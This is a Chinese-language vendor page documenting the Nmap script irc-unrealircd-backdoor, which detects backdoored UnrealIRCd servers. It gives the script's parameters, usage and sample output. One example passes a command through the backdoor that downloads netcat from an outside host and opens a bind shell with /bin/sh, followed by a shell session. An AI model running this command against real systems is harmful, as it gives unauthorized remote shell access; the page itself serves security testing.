top of page

Nmap vulns 指令與參數:irc-unrealircd-backdoor 檢查 IRC 伺服器是否被植入後門


指令摘要


檢查 IRC 伺服器是否被植入後門,方法是執行基於時間的命令(ping)並檢查響應時間。

irc-unrealircd-backdoor.command 腳本參數可以用來在遠端系統上執行任意命令。由於這種漏洞的特性(命令的輸出永遠不會返回),我們無法獲得命令的輸出。然而,它可以用來啟動 netcat 監聽器,如下所示:

$ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  $ ncat -vv localhost 4444
  Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
  Ncat: Connected to 127.0.0.1:4444.
  pwd
  /home/ron/downloads/Unreal3.2-bad
  whoami
  ron

Metasploit 也可用於利用這個漏洞。

除了執行任意命令外,還可以傳遞 irc-unrealircd-backdoor.kill 腳本參數,該參數僅用於終止 UnrealIRCd 進程。


參考資料:


指令參數


irc-unrealircd-backdoor.kill

如果設置為 1 或 true,則終止運行中的被後門感染的 UnrealIRCd。

irc-unrealircd-backdoor.wait

在執行檢查前等待的時間(秒)。建議設置這個參數以進行更可靠的檢查(100 是一個好值)。

irc-unrealircd-backdoor.command

在遠端系統上運行的任意命令(注意,您將看不到命令的輸出)。即使主機不易受攻擊,也將始終嘗試這種方法。模式 %IP% 將被替換為目標主機的 IP 地址。


指令範例


nmap -sV --script=irc-unrealircd-backdoor <target>

指令輸出

PORT     STATE SERVICE
6667/tcp open  irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

作者:

Vlatko Kosturjak Ron Bowes

License: Same as Nmap--See https://nmap.org/book/man-legal.html


隨選即看研討會


延伸閱讀

CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。


歡迎 訂閱翔宇科技主題式電子報 >,您將可同步掌握最新的產業新訊以及技術文章。
bottom of page